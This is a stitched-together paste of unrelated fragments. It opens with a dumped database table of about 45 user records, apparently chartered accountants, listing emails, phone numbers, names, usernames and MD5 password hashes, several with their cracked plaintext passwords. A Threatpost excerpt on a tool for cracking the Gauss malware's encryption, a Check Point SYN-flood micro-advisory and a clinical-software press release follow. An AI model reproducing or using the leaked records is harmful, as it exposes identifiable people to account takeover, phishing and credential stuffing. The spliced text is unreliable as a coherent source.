| NULL        | sanjeevinsaa@gmail.com          | 9650447997  | Sanjeev Saini          | NULL         | NULL                | bf42db7c280780fb02c906d7aa189247              | 1             | 93     | sanjeevsaini                    |
| NULL        | anujarora.ca@gmail.com          | 9999888090  | ANUJ ARORA             | NULL         | NULL                | 6772d1c6dc9bd66b2e34c9091d66f61e              | 1             | 94     | anujarora.ca                    |
| NULL        | acarituagarwal@gmail.com        | 9711000228  | Ritu                   | NULL         | NULL                | 801650bf3c8e20842c3ecfbfd43f8f68 (mummypapa)  | 1             | 95     | acarituagarwal                  |
| NULL        | caniteshgupta001@gmail.com      | 9871020205  | CA Nitesh Gupta        | NULL         | NULL                | 9b4a5ccfce6e874cd221615723133fb5 (110882)     | 1             | 96     | niteshgupta001                  |
| NULL        | mail@navalkapurco.com           | 0995657577  | NAVAL KAPUR            | NULL         | NULL                | 36646b29fee9a503eb2c14b175709f2d              | 1             | 97     | NAVALKAPUR&CO                   |
| NULL        | cs2007prashant@gmail.com        | 9996645456  | Prashant Kumar         | NULL         | NULL                | 0f359740bd1cda994f8b55330c86d845 (p@ssw0rd)   | 2             | 99     | cs2007prashant                  |
| NULL        | ashish.gupta@macquarie.com      | 0935007509  | Ashish                 | NULL         | NULL                | 801650bf3c8e20842c3ecfbfd43f8f68 (mummypapa)  | 1             | 100    | ashishgupta                     |
| NULL        | vipin.rathore15@gmail.com       | 9259382929  | vipin                  | NULL         | NULL                | f4416cc433e3387b35aef599457bac18              | 5             | 101    | vipinrathore                    |
| NULL        | vikasmahesh1990@yahoo.co.in     | 9358293135  |  CA Vikas Maheshwari   | NULL         | NULL                | 4122ea4f5490094a33d7cdba65136cf8 (himanshu)   | 1             | 102    | vikasmahesh1990                 |
| NULL        | khuranavivek@casansaar.com      | NULL        | CA.Khurana Vivek       | NULL         | NULL                | e10adc3949ba59abbe56e057f20f883e (123456)     | 1             | 103    | khuranavivek                    |
| NULL        | gu_nahal@yahoo.co.in            | 9729552207  | Gaurav Kumar Nahal     | NULL         | NULL                | c89101f5a655b6650dbb7d3fddaeedaf              | 5             | 104    | gu_nahal                        |
| NULL        | cavikas925@gmail.com            | 9417000925  | Vikas Goyal            | NULL         | NULL                | ad46c07a0b49ccbbfa463439f1bb2bcd              | 1             | 106    | cavikas925                      |
| NULL        | tschawla17@gmail.com            | 9660008800  | Tajendra Singh Chawla  | NULL         | NULL                | b8c8ccdb2501d8f6616222862db7223d              | 5             | 107    | Tajendra                        |
| NULL        | skca02@yahoo.co.in              | 9811389303  | SUNIL GROVER           | NULL         | NULL                | b66e652d54b84675d8def14df067b8e7              | 1             | 108    | SUNILGROVER                     |
| NULL        | manga_2007@yahoo.co.in          | 9650745339  | meenakshi              | NULL         | NULL                | 82082716189f80fd070b89ac716570ba (positive)   | 1             | 109    | mangla_2007                     |
| NULL        | mohtasurendra@gmail.com         | 9929388808  | Surendra Mohta         | NULL         | NULL                | 977baf45c0f30be06f75f06cef76bb9d              | 2             | 110    | mohtasurendra@gmail.com         |
| NULL        | pkgarg3725@gmail.com            | 9350913939  | praveen garg           | NULL         | NULL                | 5e68b55726e7765fe34ca9c48f7a8c19              | 1             | 111    | pkgarg3725                      |
| NULL        | capoorvn@gmail.com              | 9810137331  | vishwanath kapoor      | NULL         | NULL                | 6e6192ac46152d861633ecccdec80bc5              | 1             | 112    | VISHWANATHKAPOOR                |
| NULL        | cainder.g26@gmail.com           | 9876743829  | inder pal marwaha      | NULL         | NULL                | 0bb1190dabbe91038756fdf121403007              | 1             | 113    | ipsingh                         |
| NULL        | mangla_2007@yahoo.co.in         | 9650745339  | meenakshi              | NULL         | NULL                | 82082716189f80fd070b89ac716570ba (positive)   | 1             | 115    | mangla_2007@                    |
| NULL        | sacpriyaca@gmail.com            | 9810170619  | sachin jain            | NULL         | NULL                | 76f016b7156badfdfc63ea8c1eb3ea50              | 1             | 116    | sacpriyaca                      |
| NULL        | caalokmisra@gmail.com           | 9650102777  | ALOK MISRA             | NULL         | NULL                | a8c304876be7567ab1f52aa5d2edbddd              | 1             | 117    | caalokmisra                     |
| NULL        | isipsingh@gmail.com             | 9876743829  | inder                  | NULL         | NULL                | e5e75875d8d1e526dbc8fb39f9dcd634              | 1             | 118    | ipsinghg                        |
| NULL        | SONUCA2007@YAHOO.CO.IN          | NULL        | BHUPENDER AGRAWAL      | NULL         | NULL                | 4fd7483c0b93e12f693d94608f408999              | 1             | 119    | BHUPENDERAGRAWAL                |
| NULL        | vks2467@yahoo.com               | 0981012755  | VINOD KUMAR SHARMA     | NULL         | NULL                | b146a13094b0e4342b41d4f0e0df5671              | 1             | 120    | vks2467                         |
| NULL        | rakesh@rakeshkanwar.com         | 9417157093  | RAKESH KANWAR          | NULL         | NULL                | bf6ac2884e1a51a3b8f62ab9d87db74a              | 1             | 121    | rakeshkanwarca                  |
| NULL        | cahimanshukawatra@gmail.com     | 9999442384  | CA Himanshu Kawatra    | NULL         | NULL                | d30fe9ed381390d4e48cdecd92348069              | 1             | 122    | cahimanshukawatra               |
| NULL        | kotharinihar@gmail.com          | 9828472801  | Nihar Kothari          | NULL         | NULL                | 55b9e5442e44a334e82cbaa1da83237b              | 1             | 123    | kotharinihar                    |
| NULL        | anupamjain99@gmail.com          | 945003829   | CA Anupamjain          | NULL         | NULL                | 25f9e794323b453885f5181f1b624d0b (123456789)  | 1             | 124    | Anupamjain                      |
| NULL        | deepika.bhasin07@gmail.com      | 09560285442 | Deepika                | NULL         | NULL                | 238bc344b8fe5ddc8a006e7f7e0905e7              | 1             | 125    | deepikabhasin                   |
| NULL        | abhy0308@gmail.com              | 9827977457  | ABHAY KUMAR GUPTA      | NULL         | NULL                | 736b2f4af1ccfee6a65aa7441e518a09              | 1             | 126    | abhy0308                        |
| NULL        | capujagupta@gmail.com           | 9451196644  | CA. Puja Gupta         | NULL         | NULL                | 34819d7beeabb9260a5c854bc85b3e44 (mypassword) | 1             | 127    | CAPujaGupta                     |
| NULL        | mm_ca@rediffmail.com            | 9572869281  | MAYUR MISHRA           | NULL         | NULL                | e5ad7ae0fe48a230165d6b15f5be4e5f              | 1             | 128    | mayurmishra                     |
| NULL        | arun0881@yahoo.com              | 9414848291  | Arun Kumar Shrivastav  | NULL         | NULL                | 96e79218965eb72c92a549dd5a330112 (111111)     | 1             | 130    | ArunKumarShrivastav             |
| NULL        | capankajverma@yahoo.in          | NULL        | Pankaj Verma           | NULL         | NULL                | 4a5ee5609a60864d8ae298c28f04e267              | 1             | 131    | capankajverma                   |
| NULL        | manchanda.d@gmail.com           | 0941405070  | D. Manchanda           | NULL         | NULL                | 1fb85ce30f2c97417bd3575d6cde58ec              | 1             | 132    | manchanda&thakkar               |
| NULL        | incain@in.com                   | 0941405070  | Devendra MAachanda     | NULL         | NULL                | 247184f5fcf8c0afea1291676dc6df8f (cricket)    | 1             | 133    | incain                          |
| NULL        | pjain72@rediffmail.com          | 9812263504  | CA. Parveen Jain       | NULL         | NULL                | 25765f298b3373c5a7512721e7969109              | 1             | 134    | ParveenJain                     |
| NULL        | agarwalnidhi19@gmail.com        | 0999787960  | Nidhi Agarwa;          | NULL         | NULL                | 7a90e38a211ece1c346928e7d1f3e968 (accounts)   | 1             | 135    | agarwalnidhi19                  |
| NULL        | manohar1103@yahoo.co.in         | 9985260299  | manohar                | NULL         | NULL                | 362b2e6e4f5cf093d82d84b009cfa0ab              | 1             | 136    | manohar                         |
| NULL        | babelrajeev@gmail.com           | 9468582069  | Rajeev Babel           | NULL         | NULL                | 7a86bb2e7e2354c26d31cab8c3bac8e2              | 2             | 137    | babel_rajeev                    |
| NULL        | caanujkjain@gmail.com           | 9971433993  | ANUJ KUMAR JAIN        | NULL         | NULL                | 3db98519de4707e176716d27eef04d0f (170784)     | 1             | 138    | caanujkjain                     |
| NULL        | camanishmalhotra@gmail.com      | 9717560005  | CA. MANISH MALHOTRA    | NULL         | CA, CWA             | 9e719681423d318480b2ea4558c729a1              | Others        | 139    | camanishmalhotra                |
| NULL        | camanoranjan2010@gmail.com      | 9873270150  | Manoranjan Pattanayak  | NULL         | NULL                | e82305dd7f775ce50d0344cd5ce08a36              | 1             | 140    | camanoranjan2010                |
| NULL        | pinki.katariashah@gmail.com     | 0976997755  | pinki                  | NULL         | NULL                | 7ba4c1149561154eb968a324982d7d31              | 1             | 141    | Pinkishah                       |
| NULL        | suren_chouhan@yahoo.co.in       | 9887417979  | Surendra Singh Chouhan | NULL         | NULL                | 2f59edace6e7dee6dc2645401eecd60d              | 1             | 142    | suren_chouhan                   |
+-------------+---------------------------------+-------------+------------------------+--------------+---------------------+-----------------------------------------------+---------------+--------+---------------------------------+

The mystery wrapped inside a riddle that is the Gauss malware’s encryption scheme may be closer to falling. Late last week, researcher Jens Steube, known as Atom, put the wraps on a tool that should bring experts closer to breaking open the encryption surrounding the espionage malware’s payload.

The tool, called oclGaussCrack, accelerates the process of calculating the hash value of Gauss’ known cipher scheme, Steube said.

“If it matches, we know we have used the correct key and we can use it to decrypt the encrypted payload,” Steube said. “This process is very time-consuming since it takes a lot of calculations. It is so many that we cannot simply brute-force the key. We need a targeted attack to crack it.”

Gauss, along with Flame, Wiper, MiniFlame and other malicious code used in state-sponsored espionage campaigns, was one of the most concerning stories of 2012. What separated Gauss from Flame, et al, was its focus on attacking financial services organizations.

Gauss is a banking Trojan targeting Windows machines in the Middle East; it also can infect USB sticks in order to spread to other machines. It steals data such as system and network information, browser cookies, passwords and more. It also installs a custom Palida Narrow font on infected systems, for reasons still unknown, and also includes an encrypted payload that is awakened only on systems configured in certain ways.

read more...........http://threatpost.com/en_us/blogs/tool-aids-cracking-mysterious-gauss-malware-encryption-123112?utm_source=dlvr.it&utm_medium=twitter

CHECKPOINT FIREWALLS VULNERABLE TO TRIVIAL SYN FLOOD, Part 2

===========================================================
THE VULNERABILITY PROVED TO BE STILL EXISTING!
100 KPPS OF TCP SYN STILL RESULTS IN A DOS CONDITION AND CONSUMES ALL CPU POWER.

THIS WAS TESTED MANY TIMES ON DIFFERENT BOXES.
THE LAST TESTS WERE MADE WITH A CHECKPOINT 21400 APPLIANCE.
===========================================================

On Oct 20th, 2012 I have published a micro-advisory at  describing the vulnerability of CP Firewalls against trivial TCP SYN flood attacks. I tested different CP boxes and found all boxes vulnerable to TCP SYN flood attacks. Sure, every firewall has limited capacity due to many reasons, but I am not talking about large scale SYN flood attacks. One single Linux VM was enough to break the CP firewalls tested. According to CP's very own data sheet the 21400 box we have tested is capable of handling 130.000 new connections per second, see http://bit.ly/Uz2inh  So the box should handle a SYN flood with a max. amount of 100.000 TCP SYN packets with ease, when it is idle - BUT IT DOES NOT! Always the tests result in a DoS condition and the box almost stops forwarding legitimate traffic.

After contacting CP and publishing the micro-advisory on Twitter, CP released a response at http://bit.ly/UbSmil - I got in touch with CP again and they told me about their secure knowledge article I mentioned before. CP tech-support gave me a fix (sk86721) to mitigate the SYN flood vulnerability. They asked me to install the fix and do the tests again.

In the meanwhile a public paper on installing and configuring the fix was released by CP in November 2012, see http://bit.ly/YAAldQ

So in December I was back in the lab again and did a new test with the fix installed (see http://pastebin.com/xdy5WT8c for test specs). During my tests I observed that CP Firewalls are STILL VULNERABLE even with the fix installed. I am in touch with CheckPoint and we are now going to make a new test series on this.

cheers,
-- @securityfreax

IRVINE, Calif.--(BUSINESS WIRE)--InnovoCommerce LLC, makers of innovoPOINT®, the world’s leading clinical and investigator portal product, announces innovoPOINT cSafety Exchange™, a compelling new virtual private cloud-based solution for secure and compliant safety report distribution, management and reporting. Clinical sponsors face increasing complexity managing global clinical trials. In addition to mounting pressure to accelerate site qualification and overall site activation time and maintain cost structure operationally, clinical sponsors must achieve greater efficiencies while promoting regulatory compliance with overall safety reporting. As clinical trials become more global and complex in nature and regulators further scrutinize safety event monitoring, sponsors now must utilize enterprise-class technology to distribute safety reports to investigator sites, institutional review boards (IRBs) and clinical research organizations (CROs).

innovoPOINT cSafety Exchange offers pharmaceutical and biotechnology sponsors, CROs and government and academic clinical sponsors a compelling turnkey solution for the secure and compliant web-based distribution, management and tracking of safety reports, documents and related serious adverse event information.

Built as an integrated product module in the innovoPOINT solution, and also accessible as a separate cloud-based service, the innovoPOINT cSafety Exchange offering enables the clinical sponsor and investigator to securely submit and track safety reports and documents in real-time. This accelerates the appropriate collaboration and information exchange when serious events occur during a clinical trial.

The solution, hosted and managed by InnovoCommerce, provides the following immediate benefits:

Compresses the time between receiving and disseminating safety reports and documents (such as safety letters and SUSARs).
Automatic notification of distribution lists, reports and acknowledgment of receipt.
Intelligent and accurate monitoring and reporting to ensure that safety reports are reviewed in an expeditious manner for the right compound, program, trial and investigator site.
Organizing and managing CROs and other clinical partners to ensure that safety information is disseminated, tracked and acknowledged.
The innovoPOINT cSafety Exchange offering is built on the Microsoft® SharePoint® 2010 platform, capitalizing on major investments global pharmaceutical companies are making in Microsoft’s market leading collaborative platform. This solution provides a comprehensive, value-added capability for clinical sponsors to manage safety report distribution, while accelerating and managing site qualification, site activation, study conduct and study close-out, all in an integrated and seamless user friendly environment. The turnkey offering includes dedicated qualified virtual private cloud infrastructure, validation and global support and monitoring services. Key features of the offering include:

Seamless integration with innovoPOINT clinical and investigator portal, all built with standardized Microsoft SharePoint technology.
Automatic distribution of safety reports/documents to investigators, IRBs and CROs, as well as other clinical partners such as biotech firms and government and academic research organizations.
Configurable rules-based workflow for therapeutic area, program, trial and country level targeting.
Audit reporting including safety report/document type, date and time of distribution, recipient delivery status.
Interfaces to leading serious adverse event systems for seamless external routing and distribution from underlying system via the innovoPOINT cSafety Exchange.
The innovoPOINT cSafety Exchange cloud offering is successfully deployed faster than any other solution on the market worldwide. InnovoCommerce provides the most advanced, out-of-the-box and configurable features and offers a turnkey virtual private cloud to ensure security, compliance and economical flexibility for clinical sponsor customers. innovoPOINT products can be installed and managed internally or delivered via InnovoCommerce’s SAS 70 type II compliant, US-EU Safe Harbor certified, GxP compliant national data centers.

About InnovoCommerce LLC

InnovoCommerce is the world’s leading company dedicated to Microsoft SharePoint-based eClinical software solutions. The company’s clinical trial management office (CTMO®) software suite includes the market’s leading clinical and investigator portal product, study management and clinical document management offerings. InnovoCommerce helps companies manage and control their clinical information value chain from site qualification through study close-out. All InnovoCommerce solutions can be installed on premise or utilized via a flexible, secure and compliant virtual cloud-based offering. Learn more about InnovoCommerce by visiting www.innovocommerce.com.

Contacts

InnovoCommerce LLC
Media Contact:
Kristen Ford, 949-398-6550 Ext. 4003
InnovoCommerce Marketing and Communications
Fax: 949-398-6554
kristenf@innovocommerce.com